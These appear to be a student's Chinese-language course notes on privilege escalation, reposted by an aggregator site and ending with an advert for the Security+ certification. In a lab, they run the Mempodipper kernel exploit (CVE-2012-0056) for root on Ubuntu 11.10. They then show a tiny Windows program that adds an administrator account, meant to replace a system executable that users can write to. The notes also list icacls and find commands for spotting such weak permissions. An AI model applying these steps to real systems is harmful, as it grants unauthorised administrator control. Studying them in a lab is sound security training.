安全牛学习笔记利用配置不当提权
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记利用配置不当提权相关的知识,希望对你有一定的参考价值。
┃利用漏洞提权
┃Ubuntu11.10
┃http://old-releases.ubuntu.com/releases/11.10/
┃gcc
┃sudo apt-cdrom add && sudo apt-get install gcc
┃gcc 18411.c -o exp
┃CVE-2012-0056
┃/proc/pid/mem
┃kernels >=2.6.39
┃http://blog.zx2c4.com/749
[email protected]:~# searchesploit cve-2012-0056
--------------------------------------------- ----------------------------------
Exploit Title | Path
|(/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
--------------------------------------------- ----------------------------------
[email protected]:~# searchesploit 18411.c
--------------------------------------------- ----------------------------------
Exploit Title | Path
|(/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
Linux kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (1)
--------------------------------------------- ----------------------------------
[email protected]:~# scp /usr/share/exploitdb/platforms/linux/local/18411.c [email protected]:home/yuanfh
The authenticaity of host ‘192.168.1.149(192.168.1.149)‘ can‘t be established.
ECDSA key fingerprint is 91:03:af:b1:a3:db:a3:db:94:88:a6:94:bc:a7:bc:b2:f5:fd.
Are you sure you want to continue connecting(yes/no)? yes
Warning: Permanently added ‘192.168.1.149‘ (ECDSA) to the list of known hosts.
[email protected]‘s password:
18411.c
[email protected]:~$ ls
18411.c
[email protected]:~$ gcc 18411.c -o exp
[email protected]:~$ ls
18411.c exp
[email protected]:~$ chmod +x exp
[email protected]:~$ ls
18411.c exp
[email protected]:~$ w
19:16:48 up 8 min , 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
yuanfh tty1 19:09 7:07 0.71s 0.62s -bash
yuanfh pts/0 192.168.1.118 19:11 0.00s 0.53s 0.00s w
[email protected]:~$ ./exp
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent men /proc/1044/men in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for [email protected]
[+] Resolved [email protected] to 0x8049520.
[+] Calculating su padding.
[+] Seeking to offset 0x8049514.
[+] Excuting su with shellcode.
[email protected]:~$ ls /
bin etc lib mnt root selinux tmp vmlinuz
boot home lost+found opt run srv vsr
dev initrd.img media proc sbin sys var
[email protected]:~$ ls /mnt/
[email protected]:~$ ls /media/
cdrom
[email protected]:~$ ls /media/cdrom/
[email protected]:~$ sudo mount /dev/cdrom /media/cdrom
mount: black device /dev/sr0 is write-protected, mounting read-only
[email protected]:~$ ls /media/cdrom/
boot dists install md5sum.txt pool REAIME.diskdefines
cdromupgrade doc isolinux pics preseed ubuntu
[email protected]:~$ cat /etc/apt/soures.list
deb cdrom:[Ubuntu-Server 11.10 _Oneiric Ocelot_ - Release i386 (20111011)]/ oneiric main restricted
deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric main restricted universe multiverse
deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-backprots main restricted universe multiverse
deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-proposed main restricted universe multiverse
deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-security main restricted universe multiverse
deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-updates main restricted universe multiverse
deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric main restricted universe multiverse
deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-backports restricted universe multiverse
deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-proposed restricted universe multiverse
deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-security restricted universe multiverse
deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-updates restricted universe multiverse
[email protected]:~$ sudo apt-cdrom add
Using CD-ROM mount point /mdeia/cdrom/
Identifying.. [e17dd4e604f0daacc6605e2934bdca-2]
Scanning disc for index files..
Found 2 package indexes, 0 source indexes, 0 translation indexs and 1 signatures
This disc is called:
‘Ubuntu-Server 11.10 _Oneiric Ocelot_ -Release i386 (20111011)‘
Copying package list...gpgv: Signature made Tue 11 Oct 2011 09:52:05 PM CST using DSA key ID FBB75451
gpgv: Good signature from "Ubuntu CD Image Automatic Signing Key <[email protected]>"
Writing new source list
Source list entries for this disc are:
deb cdrom:[Ubuntu-Server 11.10 _Oneiric Ocelot_ - Release i386 (20111011)]/ oneiric main restricted
Repeat this proccess for the rest of the CDs in your set.
W: Skipping noneistent file /media/cdrom/dists/oneiric/main/binary-i386/Packages
W: Skipping noneistent file /media/cdrom/dists/oneiric/main/debain-installer/binary-i386/Packages
W: Skipping noneistent file /media/cdrom/dists/oneiric/restricted/binary-i386/Packages
W: Skipping noneistent file /media/cdrom/dists/oneiric/restricted/debain-installer/binary-i386/Packages
[email protected]:~$ sudo apt-get install gcc
╋━━━━━━━━━━━━━━━━━━━━━━━╋
┃利用配置不当提权 ┃
┃ 与漏洞提权相比 更常用的方法 ┃
┃ 企业环境 ┃
┃ 补丁更新的全部已经安装 ┃
┃ 输入变量过滤之外更值得研发关注的安全隐患 ┃
┃ 以system权限启动 ┃
┃ NTFS权限允许users修改删除 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━╋
┃用配置不当提权 ┃
┃ icacls ┃
┃ icacls c:\windows\*.exe /save perm /T ┃
┃ i586-mingw32msvc-gcc -o admin.exe admin.c ┃
┃ Find ┃
┃ find / -perm 777 -exec ls -l {} \ ┃
╋━━━━━━━━━━━━━━━━━━━━━━━╋
C:\Documents and Settings\Administrator>cd\
C:\>icacls
ICACLS name /save aclfile [/T] [/C] [/L] [/Q]
将匹配名称的文件和文件夹的 DACL 存储到 aclfile 中以便将来与
/restore 一起使用。请注意,未保存 SACL、所有者或完整性标签。
ICACLS directory [/substitute SidOld SidNew [...]] /restore aclfile
[/C] [/L] [/Q]
将存储的 DACL 应用于目录中的文件。
ICACLS name /setowner user [/T] [/C] [/L] [/Q]
更改所有匹配名称的所有者。该选项不会强制更改所有身份;
使用 takeown.exe 实用程序可实现该目的。
ICACLS name /findsid Sid [/T] [/C] [/L] [/Q]
查找包含显式提及 SID 的 ACL 的所有匹配名称。
ICACLS name /verify [/T] [/C] [/L] [/Q]
查找其 ACL 不规范或长度与 ACE 计数不一致的所有文件。
ICACLS name /reset [/T] [/C] [/L] [/Q]
为所有匹配文件使用默认继承的 ACL 替换 ACL。
ICACLS name [/grant[:r] Sid:perm[...]]
[/deny Sid:perm [...]]
[/remove[:g|:d]] Sid[...]] [/T] [/C] [/L]
[/setintegritylevel Level:policy[...]]
/grant[:r] Sid:perm 授予指定的用户访问权限。如果使用 :r,
这些权限将替换以前授予的所有显式权限。
如果不使用 :r,这些权限将添加到以前授予的所有显式权限。
/deny Sid:perm 显式拒绝指定的用户访问权限。
将为列出的权限添加显式拒绝 ACE,
并删除所有显式授予的权限中的相同权限。
/remove[:[g|d]] Sid 删除 ACL 中所有出现的 SID。使用
:g,将删除授予该 SID 的所有权限。使用
:d,将删除拒绝该 SID 的所有权限。
/setintegritylevel [(CI)(OI)] 级别将完整性 ACE 显式添加到所有
匹配文件。要指定的级别为以下级别之一:
L[ow]
M[edium]
H[igh]
完整性 ACE 的继承选项可以优先于级别,但只应用于
目录。
/inheritance:e|d|r
e - 启用继承
d - 禁用继承并复制 ACE
r - 删除所有继承的 ACE
注意:
Sid 可以采用数字格式或友好的名称格式。如果给定数字格式,
那么请在 SID 的开头添加一个 *。
/T 指示在以该名称指定的目录下的所有匹配文件/目录上
执行此操作。
/C 指示此操作将在所有文件错误上继续进行。仍将显示错误消息。
/L 指示此操作在符号链接本身而不是其目标上执行。
/Q 指示 icacls 应该禁止显示成功消息。
ICACLS 保留 ACE 项的规范顺序:
显式拒绝
显式授予
继承的拒绝
继承的授予
perm 是权限掩码,可以两种格式之一指定:
简单权限序列:
N - 无访问权限
F - 完全访问权限
M - 修改权限
RX - 读取和执行权限
R - 只读权限
W - 只写权限
D - 删除权限
在括号中以逗号分隔的特定权限列表:
DE - 删除
RC - 读取控制
WDAC - 写入 DAC
WO - 写入所有者
S - 同步
AS - 访问系统安全性
MA - 允许的最大值
GR - 一般性读取
GW - 一般性写入
GE - 一般性执行
GA - 全为一般性
RD - 读取数据/列出目录
WD - 写入数据/添加文件
AD - 附加数据/添加子目录
REA - 读取扩展属性
WEA - 写入扩展属性
X - 执行/遍历
DC - 删除子项
RA - 读取属性
WA - 写入属性
继承权限可以优先于每种格式,但只应用于
目录:
(OI) - 对象继承
(CI) - 容器继承
(IO) - 仅继承
(NP) - 不传播继承
(I) - 从父容器继承的权限
示例:
icacls c:\windows\* /save AclFile /T
- 将 c:\windows 及其子目录下所有文件的
ACL 保存到 AclFile。
icacls c:\windows\ /restore AclFile
- 将还原 c:\windows 及其子目录下存在的 AclFile 内
所有文件的 ACL。
icacls file /grant Administrator:(D,WDAC)
- 将授予用户对文件删除和写入 DAC 的管理员权限。
icacls file /grant *S-1-1-0:(D,WDAC)
- 将授予由 sid S-1-1-0 定义的用户对文件删除和写入 DAC 的权限。
C:\>icacls boot.ini
boot.ini BUILTIN\Power Users:<RX>
BUILTIN\Administrators:<F>
NT AUTHORITY\SYSTEM:<F>
Successfully processed 1 files; Failed processing 0 files
C:\>icacls c:\WINDOWS\*.exe /save asd /T
[email protected]:~# gedit admin.c
-------------------------------------------------------------
#include <stdilb.h>
int main()
{
int i;
i=system ("net localgroup admininistrators a /add");
return 0;
}
--------------------------------------------------------------
[email protected]:~# i586-mingw32msvc-gcc
i586-mingw32msvc-gcc i586-mingw32msvc-gcov
[email protected]:~# i586-mingw32msvc-gcc -o admin.exe admin.c
[email protected]:~# file admin.exe
admin.exe: PE32 executable (console) Intel 80386, for MS Windows
[email protected]:~# cp admin.exe /media/sf_D_DRIVE/
[email protected]:~# ls -l //查看文件权限
[email protected]:~# find / -perm 777 -exec ls -l {} \
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1965580
以上是关于安全牛学习笔记利用配置不当提权的主要内容,如果未能解决你的问题,请参考以下文章